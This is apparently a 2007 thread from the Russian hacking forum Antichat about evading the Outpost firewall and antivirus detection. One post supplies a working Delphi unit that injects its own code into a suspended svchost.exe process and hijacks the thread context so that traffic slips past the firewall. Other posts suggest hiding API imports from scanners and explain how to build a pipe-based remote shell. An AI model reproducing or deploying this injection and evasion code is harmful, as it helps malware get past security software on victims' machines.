Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
20.04.2007, 10:41
|
|
Pagan Heart
Регистрация: 12.08.2004
Сообщений: 3,791
Провел на форуме:
6490435
Репутация:
2290
|
|
if (s == INVALID_SOCKET) - это все гон, моно так: if (s == -1)
Угу, конечно можно и так, но зачем советовать плохой код вместо хорошего?
|
|
|
20.04.2007, 13:03
|
|
Познавший АНТИЧАТ
Регистрация: 02.06.2006
Сообщений: 1,188
Провел на форуме:
6023777
Репутация:
2642
|
|
Эх.. Какже легко обходить этот аутпост через поставные проги.. просто жуть. Кому интерестно, тому могу кинуть кусок кода
Дай плз, мне тож сейчас очень надо 
|
|
|
|
26.04.2007, 20:20
|
|
Познающий
Регистрация: 08.03.2007
Сообщений: 65
Провел на форуме:
91259
Репутация:
16
|
|
W!z@rD
это он написал че за студией пользовался. А винапи он и в африке винапи - любой норм. компилер скомпилит.
[sorry, тока 1. стр.читал]
Последний раз редактировалось hackconnect; 27.04.2007 в 01:06..
|
|
|
|
26.04.2007, 20:56
|
|
Постоянный
Регистрация: 23.04.2006
Сообщений: 622
Провел на форуме:
5887054
Репутация:
1292
|
|
Сообщение от sn0w
ясен пень. просто для того чтбы снести импорты.  . сканеры вроде avz любят делать предположения относительно вероятного использования программы на основе того что она импортирует из api ИМХО отсутствие любого импорта выглядит ещё подозрительней, лучше уж сразу PE-компрессором неподдержываемой версии претворяться и импортировать через GetProcAddress)))
|
|
|
|
29.04.2007, 22:33
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.03.2007
Сообщений: 1,985
Провел на форуме:
3288241
Репутация:
3349
|
|
Вот код который позволяет обходить outpost. Часть кода была взята из статьи MS-REM'a
Я его чуть оформил в виде модуля. В принципе легко его перписать на любой язык. Пробывал на Outpost 3.5 Работает всё нормально. Даже outpost не выдает предупреждений о нарушении памяти процесса.
Код:
unit df;
interface
uses
Windows,Sysutils;
procedure mains(path:pointer); // безопасный запуск процедуры. path - адресс процедуры
implementation
var
si:TStartupInfo;
pi:TProcessInformation;
procedure mains(path:pointer); // основная функция для прекрепления кода прочедуры к SVCHOST'у
var
InjectSize: dword;
Code: pointer;
Injected: pointer;
BytesWritten: dword;
Context: _CONTEXT;
begin
ZeroMemory(@St, SizeOf(TStartupInfo));
St.cb := SizeOf(TStartupInfo);
St.wShowWindow := SW_SHOW;
//запускаем процесс, которому разрешено лезть на 80 порт
CreateProcess(nil, pansichar(windir+'\system32\svchost.exe'), nil, nil, false,CREATE_SUSPENDED, nil, nil, St, Pr);
Code:=pointer(GetModuleHandle(nil));
InjectSize:=PImageOptionalHeader(pointer(integer(Code)+PImageDosHeader(Code)._lfanew+SizeOf(dword)+SizeOf(TImageFileHeader))).SizeOfImage;
//выделяем память в процессе
Injected := VirtualAllocEx(Pr.hProcess, Code, InjectSize, MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE);
//внедряем код
WriteProcessMemory(Pr.hProcess, Injected, Code, InjectSize, BytesWritten);
//изменяем контекст нити
Context.ContextFlags:=CONTEXT_FULL;
GetThreadContext(Pr.hThread, Context);
Context.Eip:=dword(path); // путь к функции
SetThreadContext(Pr.hThread, Context);
//запускаем процесс
ResumeThread(Pr.hThread);
end;
begin
end.
Последний раз редактировалось slesh; 29.04.2007 в 22:41..
|
|
|
|
29.04.2007, 22:49
|
|
Флудер
Регистрация: 27.12.2005
Сообщений: 2,372
Провел на форуме:
5339610
Репутация:
4360
|
|
slesh, ну это аутпост молчит) обычно с фаером стоит и антивирь, вот, например, KAV такое дело палит на ура
|
|
|
|
29.04.2007, 22:52
|
|
Флудер
Регистрация: 27.12.2005
Сообщений: 2,372
Провел на форуме:
5339610
Репутация:
4360
|
|
Кстати, было бы неплохо сделать в шелле не просто перенаправление hStdInput/hStdOUtput в сокет (часто глючит), а нормальную двухпоточную организацию пайпа.
Типа CreatePipe, хендлы передать в hStdInput/hStdOutput, потом следить за пайпом и передавать все оттуда в сокет. другой поток следит за сокетом и передает это в пайп.
У меня так сделано в том шелле, что я выложил в ЛоА.
|
|
|
|
29.04.2007, 23:04
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.03.2007
Сообщений: 1,985
Провел на форуме:
3288241
Репутация:
3349
|
|
2 _Great_
на счет простого перенаправления ты прав. Сам частенько замечаю что частень не пашет. Зато размер маленьких |
|
|
|
02.05.2007, 14:36
|
|
Статус пользователя:
Регистрация: 26.07.2005
Сообщений: 568
Провел на форуме:
1290766
Репутация:
1236
|
|
2 _Great_ c вопросом инжекта - очистка сдт и инжект...я ж в самом начале выложил пайповый сорс ))
|
|
|
|
06.07.2007, 17:04
|
|
Статус пользователя:
Регистрация: 26.07.2005
Сообщений: 568
Провел на форуме:
1290766
Репутация:
1236
|
|
Краш, а в курсе что например каспер определяет "root shell" по импортам приложения?
__________________
  
snow white world wide
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
